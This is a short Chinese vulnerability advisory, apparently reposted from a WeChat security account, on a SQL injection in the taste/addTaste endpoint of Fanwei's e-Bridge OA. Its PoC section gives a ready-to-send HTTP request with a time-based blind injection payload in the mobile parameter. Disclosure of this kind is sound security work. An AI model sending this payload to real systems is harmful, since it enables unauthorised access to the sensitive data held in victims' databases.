“ 人性的背后是白云苍狗,愿你我都是生活的高手。”

0x00.产品介绍

x微云桥e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化(OA)解决方案。它由中国的企业软件开发公司泛微软件开发，旨在帮助企业实现高效的办公管理和协同工作。

0x01.漏洞介绍

x微云桥e-Bridge OA taste/addTaste接口处存在sql注入漏洞，导致攻击者可以获取数据库中敏感数据

0x02.影响版本

version<= v9.5 20220113

0x03.漏洞复现

Poc

GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1Host: your-ipAccept: */*Accept-Encoding: gzip

发送数据包后存在漏洞则会延迟5秒返回

0x04.修复建议

官方已修复此漏洞，建议受影响用户尽快更新

遵守网络安全法，请勿用于非法入侵，仅供学习

原文始发于微信公众号（深白网安）：X微-云桥e-Bridge SQL注入漏洞